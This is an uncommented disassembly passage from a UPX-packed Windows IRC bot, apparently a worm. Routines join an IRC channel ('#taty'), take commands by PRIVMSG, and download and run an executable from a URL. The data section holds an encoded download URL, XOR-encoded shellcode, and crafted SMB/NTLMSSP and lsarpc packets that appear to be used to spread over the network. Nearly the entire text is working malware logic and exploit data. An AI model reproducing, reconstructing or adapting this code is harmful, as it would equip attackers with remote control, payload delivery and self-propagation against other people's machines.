leave
retn 4
sub_315030B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31503183 proc near ; CODE XREF: sub_315031EC+83�p
; UPX0:315035E9�p
var_14C = byte ptr -14Ch
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 14Ch
push esi
mov esi, ecx
call dword_31501124 ; rand
sub eax, 3
and eax, 7
push eax
lea eax, [ebp+var_20]
push eax
call sub_31501932
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_14C]
push offset aQuitS ; "QUIT %s\r\n"
push eax
call dword_3150113C ; wsprintfA
add esp, 14h
lea eax, [ebp+var_14C]
push 0
push eax
call dword_315010A0 ; lstrlenA
push eax
lea eax, [ebp+var_14C]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C ; send
push dword ptr [esi+5Ch]
call dword_315011A8 ; closesocket
xor eax, eax
pop esi
leave
retn
sub_31503183 endp
; =============== S U B R O U T I N E =======================================
sub_315031EC proc near ; CODE XREF: UPX0:315035D1�p
mov eax, offset loc_31503AC4
call sub_31503A98
sub esp, 110h
push ebx
push esi
push edi
mov edi, dword_315010C8
mov esi, ecx
mov [ebp-10h], esp
mov [ebp-14h], esi
call edi ; GetTickCount
mov [ebp-18h], eax
mov eax, [esi+5Ch]
mov dword ptr [ebp-11Ch], 1
mov [ebp-118h], eax
xor ebx, ebx
loc_31503227: ; CODE XREF: sub_315031EC+EF�j
call sub_31501A32
test eax, eax
jz short loc_31503274
push ebx
push ebx
lea eax, [ebp-11Ch]
push ebx
push eax
push 1
call dword_31501164 ; select
cmp eax, 0FFFFFFFFh
jz short loc_31503274
call sub_31501D82
test eax, eax
jz short loc_31503258
push 1
call dword_315010E0 ; ExitThread
loc_31503258: ; CODE XREF: sub_315031EC+62�j
mov [ebp-4], ebx
call edi ; GetTickCount
mov ecx, [ebp+8]
sub eax, [ebp-18h]
imul ecx, 0EA60h
cmp eax, ecx
jbe short loc_31503287
mov ecx, esi
call sub_31503183
loc_31503274: ; CODE XREF: sub_315031EC+42�j
; sub_315031EC+59�j ...
xor eax, eax
loc_31503276: ; CODE XREF: sub_315031EC+109�j
mov ecx, [ebp-0Ch]
pop edi
pop esi
mov large fs:0, ecx
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_31503287: ; CODE XREF: sub_315031EC+7F�j
push ebx
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz short loc_315032F2
mov ecx, [esi+2Ch]
push 64h
mov [ecx+eax], bl
call dword_315010A4 ; Sleep
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_3150302E
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_31503722
cmp eax, ebx
jnz short loc_31503274
or dword ptr [ebp-4], 0FFFFFFFFh
call sub_31501A32
test eax, eax
jz short loc_31503274
push 64h
call dword_315010A4 ; Sleep
jmp loc_31503227
; ---------------------------------------------------------------------------
loc_315032E0: ; DATA XREF: UPX0:31503B3C�o
mov eax, [ebp-14h]
push dword ptr [eax+5Ch]
call dword_315011A8 ; closesocket
mov eax, offset loc_315032F2
retn
; ---------------------------------------------------------------------------
loc_315032F2: ; CODE XREF: sub_315031EC+B2�j
; DATA XREF: sub_315031EC+100�o
push 1
pop eax
jmp loc_31503276
sub_315031EC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315032FA proc near ; CODE XREF: sub_31503722+9C�p
; sub_31503722+2B7�p
var_12C = byte ptr -12Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 12Ch
push ebx
push esi
mov esi, dword_315010A0
push edi
push [ebp+arg_0]
mov edi, ecx
call esi ; lstrlenA
push [ebp+arg_4]
mov ebx, eax
call esi ; lstrlenA
add ebx, eax
cmp ebx, 10Eh
jle short loc_31503329
push 1
pop eax
jmp short loc_3150336A
; ---------------------------------------------------------------------------
loc_31503329: ; CODE XREF: sub_315032FA+28�j
push [ebp+arg_4]
lea eax, [ebp+var_12C]
push [ebp+arg_0]
push offset aPrivmsgSS ; "PRIVMSG %s %s\r\n"
push eax
call dword_3150113C ; wsprintfA
add esp, 10h
push 64h
call dword_315010A4 ; Sleep
lea eax, [ebp+var_12C]
push 0
push eax
call esi ; lstrlenA
push eax
lea eax, [ebp+var_12C]
push eax
push dword ptr [edi+5Ch]
call dword_3150119C ; send
xor eax, eax
loc_3150336A: ; CODE XREF: sub_315032FA+2D�j
pop edi
pop esi
pop ebx
leave
retn 8
sub_315032FA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31503371 proc near ; CODE XREF: UPX0:31503484�p
var_24 = qword ptr -24h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_16 = word ptr -16h
var_C = qword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1Ch
lea eax, [ebp+var_1C]
push eax
call dword_31501050 ; GetSystemTime
movzx eax, [ebp+var_1A]
mov [ebp+var_4], eax
push ecx
fild [ebp+var_4]
push ecx
fstp [esp+24h+var_24]
call sub_31503AAA ; atan
movzx eax, [ebp+var_16]
fstp [ebp+var_C]
mov [ebp+var_4], eax
fild [ebp+var_4]
fstp [esp+24h+var_24]
call sub_31503AA4 ; sin
movzx eax, [ebp+var_1C]
fmul [ebp+var_C]
lea eax, [eax+eax*2]
fstp [ebp+var_C]
mov [ebp+var_4], eax
fild [ebp+var_4]
fstp [esp+24h+var_24]
call sub_31503A9E ; cos
fadd [ebp+var_C]
fstp [ebp+var_C]
push dword ptr [ebp+var_C]
call dword_31501128 ; srand
mov eax, [ebp+arg_0]
push 7
mov byte ptr [eax], 23h
inc eax
push eax
call sub_31501932
push 8
push [ebp+arg_4]
call sub_31501932
add esp, 1Ch
call dword_31501124 ; rand
push 1Ah
cdq
pop ecx
idiv ecx
mov eax, [ebp+arg_8]
mov [eax], edx
call sub_315018BA
leave
retn
sub_31503371 endp
; ---------------------------------------------------------------------------
loc_31503408: ; DATA XREF: sub_31501D96+140�o
mov eax, offset loc_31503ADB
call sub_31503A98
sub esp, 2E8h
push ebx
push esi
xor ebx, ebx
push edi
mov ds:dword_315061A4, ebx
call sub_315018BA
mov esi, dword_31501124
call esi ; rand
push 4
cdq
pop ecx
idiv ecx
lea eax, [ebp-4Ch]
add edx, ecx
push edx
push eax
call sub_31501932
cmp ds:dword_315061A0, ebx
mov edi, dword_3150106C
pop ecx
pop ecx
jz short loc_3150345D
lea eax, [ebp-4Ch]
push offset a_ ; "_"
push eax
call edi ; lstrcatA
loc_3150345D: ; CODE XREF: UPX0:31503450�j
lea eax, [ebp-4Ch]
push offset a13 ; "13"
push eax
call edi ; lstrcatA
lea ecx, [ebp-2F4h]
call sub_31502DA1
mov [ebp-4], ebx
loc_31503476: ; CODE XREF: UPX0:315035DD�j
; UPX0:31503603�j
push offset dword_315061A8
lea eax, [ebp-18h]
push offset dword_315061AC
push eax
call sub_31503371
add esp, 0Ch
loc_3150348C: ; CODE XREF: UPX0:315034A0�j
call sub_31501A32
test eax, eax
jnz short loc_315034A2
push 3E8h
call dword_315010A4 ; Sleep
jmp short loc_3150348C
; ---------------------------------------------------------------------------
loc_315034A2: ; CODE XREF: UPX0:31503493�j
xor ebx, ebx
call esi ; rand
push 7
cdq
pop ecx
idiv ecx
lea eax, [ebp-6Ch]
add edx, 5
push edx
push eax
call sub_31501932
pop ecx
xor edi, edi
pop ecx
loc_315034BD: ; CODE XREF: UPX0:315034F9�j
push 1A0Bh
lea ecx, [ebp-2F4h]
push off_31505E14
call sub_31502DB6
lea eax, [ebp-6Ch]
push eax
lea eax, [ebp-4Ch]
push eax
call dword_315010A0 ; lstrlenA
push eax
lea eax, [ebp-4Ch]
push eax
lea ecx, [ebp-2F4h]
call sub_31502DEC
test eax, eax
jz short loc_31503550
inc edi
cmp edi, 8
jl short loc_315034BD
xor edi, edi
loc_315034FD: ; CODE XREF: UPX0:3150354C�j
call sub_31501A32
test eax, eax
jz short loc_3150355E
push 1A0Bh
call esi ; rand
push 13h
xor edx, edx
pop ecx
div ecx
lea ecx, [ebp-2F4h]
push off_31505E14[edx*4]
call sub_31502DB6
lea eax, [ebp-6Ch]
push eax
lea eax, [ebp-4Ch]
push eax
call dword_315010A0 ; lstrlenA
push eax
lea eax, [ebp-4Ch]
push eax
lea ecx, [ebp-2F4h]
call sub_31502DEC
test eax, eax
jz short loc_3150355B
inc edi
cmp edi, 4Ch
jb short loc_315034FD
jmp short loc_3150355E
; ---------------------------------------------------------------------------
loc_31503550: ; CODE XREF: UPX0:315034F3�j
push 1
pop ebx
mov ds:dword_315061A4, ebx
jmp short loc_31503567
; ---------------------------------------------------------------------------
loc_3150355B: ; CODE XREF: UPX0:31503546�j
push 1
pop ebx
loc_3150355E: ; CODE XREF: UPX0:31503504�j
; UPX0:3150354E�j
cmp ds:dword_315061A4, 0
jz short loc_31503576
loc_31503567: ; CODE XREF: UPX0:31503559�j
lea eax, [ebp-18h]
push offset aTaty ; "#taty"
push eax
call dword_31501088 ; lstrcpyA
loc_31503576: ; CODE XREF: UPX0:31503565�j
test ebx, ebx
jz short loc_315035EE
call sub_31501A32
test eax, eax
jz short loc_315035EE
loc_31503583: ; CODE XREF: UPX0:315035A8�j
lea eax, [ebp-18h]
lea ecx, [ebp-2F4h]
push eax
call sub_315030B1
test eax, eax
jz short loc_315035AA
push 3E8h
call dword_315010A4 ; Sleep
call sub_31501A32
test eax, eax
jnz short loc_31503583
loc_315035AA: ; CODE XREF: UPX0:31503594�j
cmp ds:dword_315061A4, 0
jz short loc_315035BA
mov edx, 0A8C0h
jmp short loc_315035CA
; ---------------------------------------------------------------------------
loc_315035BA: ; CODE XREF: UPX0:315035B1�j
call esi ; rand
cdq
mov ecx, 1F4h
idiv ecx
add edx, 578h
loc_315035CA: ; CODE XREF: UPX0:315035B8�j
push edx
lea ecx, [ebp-2F4h]
call sub_315031EC
call sub_31501A32
test eax, eax
jz loc_31503476
lea ecx, [ebp-2F4h]
call sub_31503183
loc_315035EE: ; CODE XREF: UPX0:31503578�j
; UPX0:31503581�j
call esi ; rand
push 0Ah
cdq
pop ecx
idiv ecx
imul edx, 0EA60h
push edx
call dword_315010A4 ; Sleep
jmp loc_31503476
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31503608 proc near ; CODE XREF: sub_31503722+5E�p
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push 1
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_31501154 ; InternetOpenA
mov ebx, eax
cmp ebx, esi
jnz short loc_31503633
push 1
jmp loc_315036C9
; ---------------------------------------------------------------------------
loc_31503633: ; CODE XREF: sub_31503608+22�j
lea eax, [ebp+var_110]
push 104h
push eax
call dword_31501068 ; GetSystemDirectoryA
mov edi, dword_3150106C
lea eax, [ebp+var_110]
push offset asc_31505CF0 ; "\\"
push eax
call edi ; lstrcatA
lea eax, [ebp+var_110]
push 6
push eax
call dword_315010A0 ; lstrlenA
lea eax, [ebp+eax+var_110]
push eax
call sub_31501932
pop ecx
lea eax, [ebp+var_110]
pop ecx
push offset a_exe ; ".exe"
push eax
call edi ; lstrcatA
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_110]
push 40000000h
push eax
call dword_315010F0 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_315036A9
push 2
jmp short loc_315036C9
; ---------------------------------------------------------------------------
loc_315036A9: ; CODE XREF: sub_31503608+9B�j
push esi
push esi
push esi
push esi
push [ebp+arg_0]
push ebx
call dword_31501150 ; InternetOpenUrlA
cmp eax, esi
mov [ebp+arg_0], eax
jnz short loc_315036CC
push [ebp+var_4]
call dword_315010BC ; CloseHandle
push 3
loc_315036C9: ; CODE XREF: sub_31503608+26�j
; sub_31503608+9F�j
pop eax
jmp short loc_3150371D
; ---------------------------------------------------------------------------
loc_315036CC: ; CODE XREF: sub_31503608+B4�j
mov edi, 100000h
push edi
call sub_31502800
mov ebx, eax
pop ecx
lea eax, [ebp+var_8]
push eax
push edi
push ebx
push [ebp+arg_0]
call dword_31501158 ; InternetReadFile
lea eax, [ebp+var_C]
push esi
push eax
push [ebp+var_8]
push ebx
push [ebp+var_4]
call dword_3150104C ; WriteFile
push [ebp+var_4]
call dword_315010BC ; CloseHandle
lea eax, [ebp+var_110]
push 5
push eax
call sub_31501962
push ebx
call sub_31502814
add esp, 0Ch
xor eax, eax
loc_3150371D: ; CODE XREF: sub_31503608+C2�j
pop edi
pop esi
pop ebx
leave
retn
sub_31503608 endp
; =============== S U B R O U T I N E =======================================
sub_31503722 proc near ; CODE XREF: sub_315031EC+D1�p
var_2CC = dword ptr -2CCh
var_2C8 = byte ptr -2C8h
var_264 = byte ptr -264h
var_200 = byte ptr -200h
var_100 = byte ptr -100h
var_FF = byte ptr -0FFh
arg_0 = dword ptr 4
sub esp, 2CCh
push ebx
push ebp
push esi
push edi
push offset dword_315061AC
mov esi, ecx
push [esp+2E0h+arg_0]
call dword_31501120 ; strstr
mov edi, dword_315010C8
pop ecx
mov ebx, eax
pop ecx
mov [esp+2DCh+var_2CC], ebx
call edi ; GetTickCount
sub eax, [esi+70h]
cmp eax, 927C0h
jbe short loc_31503761
and dword ptr [esi+284h], 0
loc_31503761: ; CODE XREF: sub_31503722+36�j
cmp dword ptr [esi+7Ch], 0
jz short loc_315037C3
call edi ; GetTickCount
mov ecx, [esi+78h]
sub eax, [esi+74h]
imul ecx, 3E8h
cmp eax, ecx
jbe short loc_315037C3
lea eax, [esi+180h]
push eax
call sub_31503608
test eax, eax
pop ecx
jnz short loc_315037C3
call edi ; GetTickCount
push dword ptr [esi+78h]
and dword ptr [esi+7Ch], 0
mov [esi+70h], eax
lea eax, [esp+2E0h+var_2C8]
push offset a1D ; "-1,%d"
push eax
mov dword ptr [esi+284h], 1
call dword_3150113C ; wsprintfA
add esp, 0Ch
lea eax, [esp+2DCh+var_2C8]
mov ecx, esi
push eax
lea eax, [esi+30h]
push eax
call sub_315032FA
loc_315037C3: ; CODE XREF: sub_31503722+43�j
; sub_31503722+55�j ...
test ebx, ebx
jz loc_31503A01
push ebx
call dword_315010A0 ; lstrlenA
cmp eax, 0Ah
jle loc_31503A01
mov ebp, dword_31501110
add ebx, 8
push 7Ch
push ebx
call ebp ; strchr
mov edi, eax
pop ecx
test edi, edi
pop ecx
jz loc_31503A01
and byte ptr [edi], 0
push ebx
call dword_315010A0 ; lstrlenA
cmp eax, 100h
jge loc_31503A28
push ds:dword_315061A8
lea eax, [esp+2E0h+var_200]
push ebx
push eax
call sub_31502D3C
lea ebx, [edi+1]
push 7Ch
push ebx
mov byte ptr [edi], 7Ch
call ebp ; strchr
mov edi, eax
add esp, 14h
test edi, edi
jz loc_31503A01
and byte ptr [edi], 0
push ebx
call dword_315010A0 ; lstrlenA
cmp eax, 100h
jge loc_31503A28
push ds:dword_315061A8
lea eax, [esi+180h]
push ebx
push eax
call sub_31502D3C
add esp, 0Ch
lea eax, [esp+2DCh+var_200]
push offset aE ; "e"
push eax
call dword_31501040 ; lstrcmpA
mov ebx, dword_31501088
test eax, eax
jnz loc_31503968
lea eax, [esi+180h]
push eax
call dword_315010A0 ; lstrlenA
cmp eax, 0FFh
jge loc_31503968
cmp dword ptr [esi+284h], 0
jnz loc_31503968
cmp dword ptr [esi+7Ch], 0
jnz loc_31503968
lea eax, [edi+1]
push 7Ch
push eax
call ebp ; strchr
mov ebp, eax
pop ecx
test ebp, ebp
pop ecx
jz loc_31503949
and byte ptr [ebp+0], 0
lea eax, [edi+1]
push eax
call dword_315010A0 ; lstrlenA
cmp eax, 100h
jge loc_31503A28
lea eax, [edi+1]
push eax
lea eax, [esp+2E0h+var_100]
push eax
call ebx ; lstrcpyA
push [esp+2DCh+var_2CC]
lea eax, [esi+80h]
mov byte ptr [edi], 7Ch
push eax
call ebx ; lstrcpyA
mov byte ptr [ebp+0], 7Ch
and byte ptr [edi], 0
cmp [esp+2DCh+var_100], 65h
jle short loc_31503956
lea eax, [esp+2DCh+var_FF]
push eax
call dword_315010F8 ; atoi
mov ebp, eax
pop ecx
test ebp, ebp
jz short loc_31503956
cmp ebp, 0E10h
jnb short loc_31503956
call dword_31501124 ; rand
xor edx, edx
mov dword ptr [esi+7Ch], 1
div ebp
mov [esi+78h], edx
call dword_315010C8 ; GetTickCount
mov [esi+74h], eax
jmp short loc_31503956
; ---------------------------------------------------------------------------
loc_31503949: ; CODE XREF: sub_31503722+19D�j
push [esp+2DCh+var_2CC]
lea eax, [esi+80h]
push eax
call ebx ; lstrcpyA
loc_31503956: ; CODE XREF: sub_31503722+1E9�j
; sub_31503722+1FE�j ...
lea eax, [esi+80h]
push offset asc_31506124 ; "|"
push eax
call dword_3150106C ; lstrcatA
loc_31503968: ; CODE XREF: sub_31503722+15A�j
; sub_31503722+172�j ...
mov ebp, dword_31501040
lea eax, [esp+2DCh+var_200]
push offset aI ; "i"
push eax
call ebp ; lstrcmpA
test eax, eax
jnz short loc_315039DE
lea eax, [esp+2DCh+var_2C8]
push offset dword_315061CC
push eax
call ebx ; lstrcpyA
lea eax, [esp+2DCh+var_2C8]
push 63h
push eax
push 7
push 400h
call dword_31501040+4
push ds:dword_31506198
lea eax, [esp+2E0h+var_2C8]
push eax
lea eax, [esp+2E4h+var_264]
push ds:dword_31506194
push ds:dword_3150615C
push offset aDD13SD ; "%d,%d,13%s,%d"
push eax
call dword_3150113C ; wsprintfA
add esp, 18h
lea eax, [esp+2DCh+var_264]
mov ecx, esi
push eax
lea eax, [esi+30h]
push eax
call sub_315032FA
loc_315039DE: ; CODE XREF: sub_31503722+25D�j
lea eax, [esp+2DCh+var_200]
push offset aQ ; "q"
push eax
call ebp ; lstrcmpA
test eax, eax
jnz short loc_315039FE
cmp [esi+284h], eax
jz short loc_315039FE
push 1
pop eax
jmp short loc_31503A2A
; ---------------------------------------------------------------------------
loc_315039FE: ; CODE XREF: sub_31503722+2CD�j
; sub_31503722+2D5�j
mov byte ptr [edi], 7Ch
loc_31503A01: ; CODE XREF: sub_31503722+A3�j
; sub_31503722+B3�j ...
cmp dword ptr [esi+284h], 0
jz short loc_31503A28
push offset aJoin ; "JOIN"
push [esp+2E0h+arg_0]
call dword_31501120 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_31503A28
call dword_31501124 ; rand
loc_31503A28: ; CODE XREF: sub_31503722+E2�j
; sub_31503722+123�j ...
xor eax, eax
loc_31503A2A: ; CODE XREF: sub_31503722+2DA�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 2CCh
retn 4
sub_31503722 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A38 proc near ; CODE XREF: sub_315011C0+128�p
; sub_315011C0+134�p ...
jmp dword_31501134
sub_31503A38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A3E proc near ; CODE XREF: sub_315011C0+9C�p
; sub_315011C0+C5�p ...
jmp dword_31501130
sub_31503A3E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A44 proc near ; CODE XREF: sub_315011C0+93�p
; sub_315011C0+B2�p ...
jmp dword_3150112C
sub_31503A44 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_31503A50 proc near ; CODE XREF: sub_315011C0+8�p
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_31503A70
loc_31503A5C: ; CODE XREF: sub_31503A50+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_31503A5C
loc_31503A70: ; CODE XREF: sub_31503A50+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_31503A50 endp
; ---------------------------------------------------------------------------
align 10h
loc_31503A80: ; DATA XREF: sub_31501D96+A�o
jmp dword ptr loc_3150111C
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A86 proc near ; CODE XREF: sub_31501F6B+10C�p
; sub_31501F6B+119�p ...
jmp dword_31501118
sub_31503A86 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A8C proc near ; CODE XREF: sub_31501F6B+35�p
jmp dword_31501114
sub_31503A8C endp
; ---------------------------------------------------------------------------
loc_31503A92: ; CODE XREF: UPX0:31503AC9�j
; UPX0:31503AE0�j
jmp dword ptr locret_3150110A+2
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A98 proc near ; CODE XREF: sub_315031EC+5�p
; UPX0:3150340D�p
jmp dword ptr loc_31501108
sub_31503A98 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A9E proc near ; CODE XREF: sub_31503371+4F�p
jmp dword_31501104
sub_31503A9E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503AA4 proc near ; CODE XREF: sub_31503371+34�p
jmp dword_31501100
sub_31503AA4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503AAA proc near ; CODE XREF: sub_31503371+1F�p
jmp dword_315010FC
sub_31503AAA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503AB0 proc near ; CODE XREF: sub_31502490+AB�p
jmp dword_31501084
sub_31503AB0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503AB6 proc near ; CODE XREF: sub_31502490+64�p
jmp dword_3150107C
sub_31503AB6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503ABC proc near ; CODE XREF: sub_31502490+2D�p
jmp dword_31501078
sub_31503ABC endp
; ---------------------------------------------------------------------------
align 4
loc_31503AC4: ; DATA XREF: sub_315031EC�o
mov eax, offset dword_31503AE8
jmp loc_31503A92
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp-2F4h]
jmp loc_31502DD4
; ---------------------------------------------------------------------------
loc_31503ADB: ; DATA XREF: UPX0:loc_31503408�o
mov eax, offset dword_31503B40
jmp loc_31503A92
; ---------------------------------------------------------------------------
align 4
dword_31503AE8 dd 19930520h, 2, 31503B08h, 1, 31503B18h, 3 dup(0)
; DATA XREF: UPX0:loc_31503AC4�o
dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 31503B30h, 4 dup(0)
dd offset loc_315032E0
dword_31503B40 dd 19930520h, 1, 31503B60h, 5 dup(0) dd 0FFFFFFFFh, 31503AD0h, 526h dup(0)
byte_31505000 db 0EBh ; DATA XREF: sub_315011C0+24E�o
; sub_315011C0+260�o ...
db 58h
word_31505002 dw 7468h ; DATA XREF: sub_31502277+40�o
dd 2F3A7074h, 3732312Fh, 302E302Eh, 383A312Eh, 652F3030h
dd 6578652Eh, 4 dup(0DFDFDFDFh), 7A6F4DDFh, 616C6C69h
dd 302E342Fh, 0C9335DDFh, 1F1B966h, 8B05758Dh, 3C068AFEh
dd 46057599h, 302C068Ah, 88993446h, 0EDE24707h, 0DAE80AEBh
dd 2EFFFFFFh, 2E676562h, 0C9999371h, 0C999C999h, 91BDFD12h
dd 0C99916FDh, 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 9998A91Ch
dd 0C9C999C9h, 98F198F3h, 9986C999h, 98C571C9h, 0C999C999h
dd 37CB5F90h, 1C965992h, 99C99978h, 14C999C9h, 7D7157E4h
dd 0C999C999h, 0E414C999h, 9945713Ah, 99C999C9h, 0F19DF3C9h
dd 9989C999h, 0F1C999C9h, 0C999C999h, 0F3C9999Ch, 0B471C999h
dd 99C99998h, 0E3F367C9h, 0D11C10F0h, 99C99998h, 0C959B2C9h
dd 0C99BF3C9h, 0C999F1C9h, 0C999C999h, 0A20414D9h, 99C99998h
dd 9371CAC9h, 99C99998h, 61688DC9h, 0AE1C1091h, 99C99998h
dd 66611AC9h, 99111D96h, 99C999C9h, 0C850B2C9h, 98F3C8C8h
dd 0C957DC14h, 0C9992671h, 0C999C999h, 91C0A44Eh, 59924912h
dd 59B2F7EDh, 0C9C9C9C9h, 0CA3AC414h, 993C71CBh, 99C999C9h
dd 0E424FFC9h, 0ED599221h, 0F1CDCDCFh, 0C999C999h, 66C9999Ch
dd 9998D12Ch, 0C9C999C9h, 0C9991371h, 0C999C999h, 83B8B0FBh
dd 5D12CDC3h, 0C9C999F3h, 0D12C66CBh, 99C99998h, 0AE2C66C9h
dd 99C99998h, 990C71C9h, 99C999C9h, 0A6485AC9h, 2C66C096h
dd 0C99998AEh, 1C71C999h, 0C999C999h, 294CC999h, 9CF3EBA7h
dd 98A20414h, 0C999C999h, 99EA71CAh, 99C999C9h, 26F434C9h
dd 0C999F371h, 0C999F171h, 0C999C999h, 0EF133BF9h, 376B4629h
dd 9966DE5Fh, 0A8EC5AC9h, 0F0ABB7AAh, 2 dup(0C999C999h)
dd 0C5B7C999h, 0ECE9EDFFh, 0FCB7FDE9h, 0C999FCE1h, 6 dup(0C999C999h)
dd 0FCFCF5CAh, 0F2C999E9h, 0FCF7EBFCh, 99ABAAF5h, 0F934C7C9h
dd 25B459AAh, 0C9662A2Ah, 819093ACh, 909CC9B7h, 0C983639Dh
dd 999271CDh, 99C999C9h, 3519BFC9h, 0BDFD1451h, 91720A95h
dd 71F934C7h, 99C999C8h, 12C999C9h, 0D512A5D2h, 529AE180h
dd 8D146FAAh, 0B9C89A2Ah, 4A9A8B12h, 595859AAh, 0DB9BAB9Eh
dd 0C999A319h, 0DDA26CECh, 9EED85BDh, 81E8A2DFh, 125544EBh
dd 4A9ABDC8h, 0EB8D2E96h, 9A85D812h, 99D125Ah, 0DD105A9Ah
dd 10F885BDh, 9998D51Ch, 66C999C9h, 0FD7F6649h, 0A98712FEh
dd 0C212C999h, 85C21295h, 0C2128212h, 0FCB75A91h, 0B7FDF7h
dword_315052C8 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_315011C0+186�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_31505354 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+1BA�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dword_31505400 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+1EE�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_315054E0 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+8D�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_315011C0+BF�o
unicode 0, <C$>,0
a????? db '?????',0
dd 0
dword_31505544 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+2D4�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_315055B0 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+308�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_31505654 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+4EE�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
